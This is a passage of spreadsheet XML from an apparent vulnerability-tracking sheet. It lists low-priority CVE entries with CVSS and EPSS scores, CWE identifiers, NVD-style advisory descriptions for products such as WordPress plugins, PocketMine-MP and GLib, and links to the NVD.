        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5016" s="5" t="inlineStr"/>
      <c r="K5016" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L5016" s="5" t="inlineStr">
        <is>
          <t>Improper state validation in Safebrowsing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87656</t>
        </is>
      </c>
    </row>
    <row r="5017">
      <c r="A5017" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5017" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-43718</t>
        </is>
      </c>
      <c r="C5017" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5017" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5017" s="5" t="inlineStr"/>
      <c r="F5017" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5017" s="5" t="inlineStr"/>
      <c r="H5017" s="5" t="inlineStr"/>
      <c r="I5017" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5017" s="5" t="inlineStr"/>
      <c r="K5017" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L5017" s="5" t="inlineStr">
        <is>
          <t>An Authentication Bypass vulnerability exists in EPSON EH-TW5350 EPSON 150075647YWWV110, which could let a remote malicious user cause a Denial of Service via specially crafted series of HTTP..</t>
        </is>
      </c>
      <c r="M5017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-43718</t>
        </is>
      </c>
    </row>
    <row r="5018">
      <c r="A5018" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5018" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51011</t>
        </is>
      </c>
      <c r="C5018" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5018" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5018" s="5" t="inlineStr"/>
      <c r="F5018" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5018" s="5" t="inlineStr"/>
      <c r="H5018" s="5" t="inlineStr"/>
      <c r="I5018" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5018" s="5" t="inlineStr"/>
      <c r="K5018" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5018" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 4.2.10 fails to validate the total length of incoming chat message blobs before splitting them by newline characters, allowing attackers to send large messages containing many newlines. Malicious clients can send megabyte-sized chat packets and bombard the server with thousands of such messages, causing server lockups lasting seconds or minutes.</t>
        </is>
      </c>
      <c r="M5018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51011</t>
        </is>
      </c>
    </row>
    <row r="5019">
      <c r="A5019" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5019" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51016</t>
        </is>
      </c>
      <c r="C5019" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5019" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5019" s="5" t="inlineStr"/>
      <c r="F5019" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5019" s="5" t="inlineStr"/>
      <c r="H5019" s="5" t="inlineStr"/>
      <c r="I5019" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5019" s="5" t="inlineStr"/>
      <c r="K5019" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L5019" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP 3.x (before 3.27.0) does not implement Minecraft Bedrock protocol encryption, so the server cannot verify that a connecting client possesses the private key corresponding to its login token. An attacker who captures a valid login from another player's session (for example by tricking the player into connecting to an attacker-controlled server) can replay that login to impersonate the victim and pass XBOX Live authentication until the JWT token expires (typically 2-3 days). This affects servers directly reachable over the internet that are not behind a proxy with encryption enabled. Fixed in 4.0.0 and backported to 3.27.0.</t>
        </is>
      </c>
      <c r="M5019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51016</t>
        </is>
      </c>
    </row>
    <row r="5020">
      <c r="A5020" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5020" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54394</t>
        </is>
      </c>
      <c r="C5020" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5020" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5020" s="5" t="inlineStr"/>
      <c r="F5020" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5020" s="5" t="inlineStr"/>
      <c r="H5020" s="5" t="inlineStr"/>
      <c r="I5020" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5020" s="5" t="inlineStr"/>
      <c r="K5020" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5020" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 4.18.0-ALPHA2 fails to rate-limit mismatch type InventoryTransactionPacket requests, allowing attackers to trigger excessive inventory synchronization. Attackers can send numerous mismatch transactions to force the server to transmit large amounts of serialized inventory data, consuming significant bandwidth without authentication.</t>
        </is>
      </c>
      <c r="M5020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54394</t>
        </is>
      </c>
    </row>
    <row r="5021">
      <c r="A5021" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5021" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54395</t>
        </is>
      </c>
      <c r="C5021" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5021" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5021" s="5" t="inlineStr"/>
      <c r="F5021" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5021" s="5" t="inlineStr"/>
      <c r="H5021" s="5" t="inlineStr"/>
      <c r="I5021" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5021" s="5" t="inlineStr"/>
      <c r="K5021" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L5021" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.12.5 contain a denial-of-service vulnerability in ModalFormResponsePacket processing that allows attackers to cause server resource exhaustion by sending large JSON payloads. Attackers can send numerous oversized modal form response packets to consume CPU time and prevent the server from processing legitimate connections.</t>
        </is>
      </c>
      <c r="M5021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54395</t>
        </is>
      </c>
    </row>
    <row r="5022">
      <c r="A5022" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5022" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-3653</t>
        </is>
      </c>
      <c r="C5022" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5022" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5022" s="5" t="inlineStr"/>
      <c r="F5022" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G5022" s="5" t="inlineStr"/>
      <c r="H5022" s="5" t="inlineStr"/>
      <c r="I5022" s="5" t="inlineStr">
        <is>
          <t>2024-07-08</t>
        </is>
      </c>
      <c r="J5022" s="5" t="inlineStr"/>
      <c r="K5022" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L5022" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.</t>
        </is>
      </c>
      <c r="M5022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-3653</t>
        </is>
      </c>
    </row>
    <row r="5023">
      <c r="A5023" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5023" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15691</t>
        </is>
      </c>
      <c r="C5023" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5023" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5023" s="5" t="inlineStr"/>
      <c r="F5023" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5023" s="5" t="inlineStr"/>
      <c r="H5023" s="5" t="inlineStr"/>
      <c r="I5023" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5023" s="5" t="inlineStr"/>
      <c r="K5023" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5023" s="5" t="inlineStr">
        <is>
          <t>The WPFunnels  WordPress plugin before 3.13.0 does not check whether user registration is enabled on the site before creating accounts from opt-in form submissions, relying on a value supplied in the request instead, allowing unauthenticated attackers to create WordPress user accounts even when registration is disabled.
This is an incomplete fix for CVE-2025-12353: the check added in 3.6.3 covers only one of the three registration paths.</t>
        </is>
      </c>
      <c r="M5023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15691</t>
        </is>
      </c>
    </row>
    <row r="5024">
      <c r="A5024" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11446</t>
        </is>
      </c>
      <c r="C5024" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5024" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5024" s="5" t="inlineStr"/>
      <c r="F5024" s="5" t="inlineStr"/>
      <c r="G5024" s="5" t="inlineStr"/>
      <c r="H5024" s="5" t="inlineStr"/>
      <c r="I5024" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5024" s="5" t="inlineStr"/>
      <c r="K5024" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5024" s="5" t="inlineStr">
        <is>
          <t>The Booktics – Booking Calendar for Appointments and Service Businesses plugin for WordPress is vulnerable to unauthorized modification of data in all versions up to, and including, 1.0.23. This is due to the create_order_permission() permission callback on the POST /wp-json/booktics/v1/orders REST route unconditionally returning true, combined with find_and_update_guest() overwriting an existing customer record's stored name, phone, and wp_user_id whenever the caller-supplied email matches, with no proof of ownership. This makes it possible for unauthenticated attackers to overwrite the contact details (name and phone) of any existing customer whose email address they know, poisoning downstream reminder emails, SMS, calendar invites, and CRM data.</t>
        </is>
      </c>
      <c r="M5024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11446</t>
        </is>
      </c>
    </row>
    <row r="5025">
      <c r="A5025" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12215</t>
        </is>
      </c>
      <c r="C5025" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5025" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5025" s="5" t="inlineStr"/>
      <c r="F5025" s="5" t="inlineStr"/>
      <c r="G5025" s="5" t="inlineStr"/>
      <c r="H5025" s="5" t="inlineStr"/>
      <c r="I5025" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5025" s="5" t="inlineStr"/>
      <c r="K5025" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L5025" s="5" t="inlineStr">
        <is>
          <t>The OTP Login &amp; Register Woocommerce plugin for WordPress is vulnerable to Authentication Bypass via OTP Brute Force in all versions up to, and including, 2.7.2. The vulnerability exists because the OTP rate-limit attempt counter in `process_otp_form` is keyed exclusively on the attacker-controlled `xoo_ml_user_ip_data` cookie's `ip_address` field, allowing unlimited counter resets by simply rotating the cookie, while the OTP itself is generated with PHP's non-cryptographic `rand()` function over a default space of only 9,000 possible values (1000–9999), and both the OTP issuance endpoint (`xoo_ml_login_with_otp`) and verification endpoint (`xoo_ml_otp_form_submit`) are registered as unauthenticated `wp_ajax_nopriv` actions with no nonce or capability checks. This makes it possible for unauthenticated attackers to brute-force the OTP for any registered account and obtain a full WordPress authentication session — including for administrator accounts — via `wp_set_auth_cookie()` in `login_user_with_otp()`. Exploitation requires the attacker to know the target user's registered phone number, which is used to trigger OTP issuance via the unauthenticated `xoo_ml_login_with_otp` endpoint.</t>
        </is>
      </c>
      <c r="M5025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12215</t>
        </is>
      </c>
    </row>
    <row r="5026">
      <c r="A5026" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12956</t>
        </is>
      </c>
      <c r="C5026" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5026" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5026" s="5" t="inlineStr"/>
      <c r="F5026" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5026" s="5" t="inlineStr"/>
      <c r="H5026" s="5" t="inlineStr"/>
      <c r="I5026" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5026" s="5" t="inlineStr"/>
      <c r="K5026" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5026" s="5" t="inlineStr">
        <is>
          <t>The WP Event Solution (Eventin) plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 4.1.22 via the create_item() handler for the /wp-json/eventin/v2/orders REST endpoint. The endpoint's create_item_permissions_check() function only verifies a wp_rest nonce (which is leaked to every visitor through the etn-public script's localized_data_obj on every frontend page) and accepts a user-supplied 'status' value in prepare_item_for_database() with no whitelist validation. This makes it possible for unauthenticated attackers to create etn-order posts with status='completed' that are counted as sold by etn_get_sold_tickets_by_event(); because the auto-cleanup wp_schedule_single_event() in create_item() only fires for status='pending' orders, the forged completed orders persist indefinitely and exhaust ticket inventory.</t>
        </is>
      </c>
      <c r="M5026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12956</t>
        </is>
      </c>
    </row>
    <row r="5027">
      <c r="A5027" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12962</t>
        </is>
      </c>
      <c r="C5027" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5027" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5027" s="5" t="inlineStr"/>
      <c r="F5027" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5027" s="5" t="inlineStr"/>
      <c r="H5027" s="5" t="inlineStr"/>
      <c r="I5027" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5027" s="5" t="inlineStr"/>
      <c r="K5027" s="5" t="inlineStr">
        <is>
          <t>CWE-942</t>
        </is>
      </c>
      <c r="L5027" s="5" t="inlineStr">
        <is>
          <t>A Permissive Cross-domain Security Policy with Untrusted Domains in Armoury Crate allows a remote user to obtain a local user's NTLM hash by convincing the user to visit a crafted web page that sends a request containing a UNC path to the application's local service endpoint.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M5027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12962</t>
        </is>
      </c>
    </row>
    <row r="5028">
      <c r="A5028" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14350</t>
        </is>
      </c>
      <c r="C5028" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5028" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5028" s="5" t="inlineStr"/>
      <c r="F5028" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5028" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H5028" s="5" t="inlineStr"/>
      <c r="I5028" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5028" s="5" t="inlineStr"/>
      <c r="K5028" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="L5028" s="5" t="inlineStr">
        <is>
          <t>IBM Cloud Pak for Data System 11.3.0.2 through Interim Fix 001 could allow an unauthorized user to inject data into log messages due to improper neutralization of special elements when written to log files.</t>
        </is>
      </c>
      <c r="M5028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14350</t>
        </is>
      </c>
    </row>
    <row r="5029">
      <c r="A5029" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14562</t>
        </is>
      </c>
      <c r="C5029" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5029" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5029" s="5" t="inlineStr"/>
      <c r="F5029" s="5" t="inlineStr"/>
      <c r="G5029" s="5" t="inlineStr"/>
      <c r="H5029" s="5" t="inlineStr"/>
      <c r="I5029" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5029" s="5" t="inlineStr"/>
      <c r="K5029" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5029" s="5" t="inlineStr">
        <is>
          <t>The teddy-bear-customize-addon WordPress plugin through 1.0.5 does not perform any authorization or ownership checks before returning WooCommerce order metadata and the URLs of customer-uploaded attachments, allowing unauthenticated attackers to disclose other customers' order and attachment data.</t>
        </is>
      </c>
      <c r="M5029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14562</t>
        </is>
      </c>
    </row>
    <row r="5030">
      <c r="A5030" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15141</t>
        </is>
      </c>
      <c r="C5030" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5030" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5030" s="5" t="inlineStr"/>
      <c r="F5030" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5030" s="5" t="inlineStr"/>
      <c r="H5030" s="5" t="inlineStr">
        <is>
          <t>tp-link:tl-wr820n, tp-link:tl-wr820n_firmware</t>
        </is>
      </c>
      <c r="I5030" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5030" s="5" t="inlineStr"/>
      <c r="K5030" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L5030" s="5" t="inlineStr">
        <is>
          <t>The web
interface of the affected
device relies on the HTTP referrer header as part of
request validation.  Requests containing empty Referer value, or omitting
the Referer header entirely, may be accepted and processed due to insufficient
validation logic.
Successful exploitation may allow an adjacent attacker with access to the web management
interface to obtain device configuration details and other sensitive
information.</t>
        </is>
      </c>
      <c r="M5030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15141</t>
        </is>
      </c>
    </row>
    <row r="5031">
      <c r="A5031" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15461</t>
        </is>
      </c>
      <c r="C5031" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5031" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5031" s="5" t="inlineStr"/>
      <c r="F5031" s="5" t="inlineStr"/>
      <c r="G5031" s="5" t="inlineStr"/>
      <c r="H5031" s="5" t="inlineStr"/>
      <c r="I5031" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5031" s="5" t="inlineStr"/>
      <c r="K5031" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L5031" s="5" t="inlineStr">
        <is>
          <t>The Sierra Wireless HL78xx modem GNSS driver (drivers/modem/hl78xx/, later drivers/modem/vendor_standalone/hl78xx/) embeds a generic struct gnss_nmea0183_match_data match_data inside struct hl78xx_gnss_data. The generic NMEA0183 match helper (drivers/gnss/gnss_nmea0183_match.c) requires that context to be the first member because its callbacks cast user_data directly to struct gnss_nmea0183_match_data . In the affected releases match_data was the second member (after const struct device dev), so it sat at a non-zero offset while gnss_nmea0183_match_init() initialized it at the correct address. The registered NMEA handlers instead pass the whole device data object (data-&gt;devices.gnss-&gt;data, offset 0), producing an offset-shifted type confusion between where state is initialized and where the parse callbacks read and write it.
When NMEA sentences from the GNSS receiver are parsed, the GGA/RMC callbacks write parsed fix data into the wrong location within the struct, and the GSV callback (gnss_nmea0183_match_gsv_callback, active under CONFIG_GNSS_SATELLITES) reads its satellites pointer and bound from the wrong offsets — non-pointer bytes of struct hl78xx_gnss_data — and then writes parsed struct gnss_satellite entries through that bogus pointer. This is a write through an uninitialized/wild pointer with a garbage bound.
The NMEA handlers are registered by default (CONFIG_HL78XX_GNSS_SOURCE_NMEA is the default GNSS source) on devices using the HL78xx GNSS. The driver runs in kernel context and the NMEA data originates from the GNSS radio front-end, so a party able to influence the GNSS signal (for example GNSS/GPS spoofing at radio proximity) can drive the kernel-side parser into the faulty write. The most likely impact is a crash (denial of service) because the bogus pointer resolves to a fixed near-NULL value, with adjacent-memory corruption possible on MMU-less targets. Confidentiality is not affected. Exploitation requires the satellites feature to be enabled and active, so attack complexity is high.</t>
        </is>
      </c>
      <c r="M5031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15461</t>
        </is>
      </c>
    </row>
    <row r="5032">
      <c r="A5032" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15588</t>
        </is>
      </c>
      <c r="C5032" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5032" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5032" s="5" t="inlineStr"/>
      <c r="F5032" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5032" s="5" t="inlineStr"/>
      <c r="H5032" s="5" t="inlineStr"/>
      <c r="I5032" s="5" t="inlineStr">
        <is>
          <t>2026-07-20</t>
        </is>
      </c>
      <c r="J5032" s="5" t="inlineStr"/>
      <c r="K5032" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5032" s="5" t="inlineStr">
        <is>
          <t>A denial-of-service and resource exhaustion vulnerability exists within the `GDBus` component of GLib. The `gdbusauth` authentication mechanism fails to enforce proper length limitations on data lines read from a client. An unauthenticated local or remote attacker can exploit this lack of input validation by sending excessively long streams of data, causing the application to consume massive amounts of system memory and CPU, potentially leading to a crash or system hang.</t>
        </is>
      </c>
      <c r="M5032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15588</t>
        </is>
      </c>
    </row>
    <row r="5033">
      <c r="A5033" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15937</t>
        </is>
      </c>
      <c r="C5033" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5033" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5033" s="5" t="inlineStr"/>
      <c r="F5033" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5033" s="5" t="inlineStr"/>
      <c r="H5033" s="5" t="inlineStr"/>
      <c r="I5033" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5033" s="5" t="inlineStr"/>
      <c r="K5033" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L5033" s="5" t="inlineStr">
        <is>
          <t>Improper certificate validation in Checkmk &lt;2.5.0p10 allows a relay and a push agent that share the same UUID to reuse each other's mTLS certificate to authenticate against agent receiver endpoints in either direction, because the endpoints do not verify that the certificate was issued by their own root certificate.</t>
        </is>
      </c>
      <c r="M5033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15937</t>
        </is>
      </c>
    </row>
    <row r="5034">
      <c r="A5034" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16660</t>
        </is>
      </c>
      <c r="C5034" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5034" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5034" s="5" t="inlineStr"/>
      <c r="F5034" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5034" s="5" t="inlineStr">
        <is>
          <t>ibm, db2</t>
        </is>
      </c>
      <c r="H5034" s="5" t="inlineStr">
        <is>
          <t>ibm:db2_mirror_for_i</t>
        </is>
      </c>
      <c r="I5034" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5034" s="5" t="inlineStr"/>
      <c r="K5034" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5034" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 Mirror for i 7.4, 7.5, and 7.6 could allow a remote attacker to cause a denial of service due to an out-of-bounds read.</t>
        </is>
      </c>
      <c r="M5034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16660</t>
        </is>
      </c>
    </row>
    <row r="5035">
      <c r="A5035" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17264</t>
        </is>
      </c>
      <c r="C5035" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5035" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5035" s="5" t="inlineStr"/>
      <c r="F5035" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5035" s="5" t="inlineStr"/>
      <c r="H5035" s="5" t="inlineStr"/>
      <c r="I5035" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5035" s="5" t="inlineStr"/>
      <c r="K5035" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L5035" s="5" t="inlineStr">
        <is>
          <t>Opening a crafted DICOM file containing malicious JPEG-compressed pixel data triggers an attacker-controlled heap out-of-bounds write, which may allow an attacker to remotely execute arbitrary code.</t>
        </is>
      </c>
      <c r="M5035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17264</t>
        </is>
      </c>
    </row>
    <row r="5036">
      <c r="A5036" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17517</t>
        </is>
      </c>
      <c r="C5036" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5036" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5036" s="5" t="inlineStr"/>
      <c r="F5036" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5036" s="5" t="inlineStr"/>
      <c r="H5036" s="5" t="inlineStr"/>
      <c r="I5036" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5036" s="5" t="inlineStr"/>
      <c r="K5036" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5036" s="5" t="inlineStr">
        <is>
